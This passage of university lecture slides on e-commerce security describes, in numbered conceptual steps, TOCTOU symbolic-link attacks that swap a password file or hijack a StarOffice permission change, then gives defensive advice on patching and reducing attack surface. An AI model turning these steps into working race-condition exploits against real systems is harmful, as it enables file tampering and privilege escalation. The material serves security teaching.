  65. 65. TOCTOU Exploits Symbolic Link 1. Attacker creates bogus password file called .rhosts 2. Attacker places .rhosts into attack_dir 3. Real password file is in victim_dir 4. Attacker creates symbolic link to attack_dir, called symdir. 5. Attacker calls passwd passing password file as /symdir/.rhosts. 6. Attacker changes /symdir so that password in steps 1 and 3 refers to attack_dir and in steps 2 and 4 to victim_dir. 7. Result: password file in victim_dir is replaced by password file in attack_dir.
  66. 66. TOCTOU Exploits Symbolic Link  Symlink attack can cause exploited software to open, remove, read, or write a hijacked file or directory.  Other example: StarOffice  Exploit substitutes a symbolic link for a file whose permission StarOffice is about to elevate.  Result: File referred to gets permissions updated.
  67. 67. Morale  Existing code base is full of software errors.  Changing to safer languages is going to alleviate the problem.  All application software is under suspicion.  Fast patching protects against most attacks.  But not zero-day exploits  Patching can break applications, hence:  Test on test servers before applying patches.  Decrease attack surface by  running as few applications as possible  running services at lowest possible privilege level.
  68. 68. COEN 351 E-Commerce Security  E-Commerce Security Course Homepage  Lecture Notes

×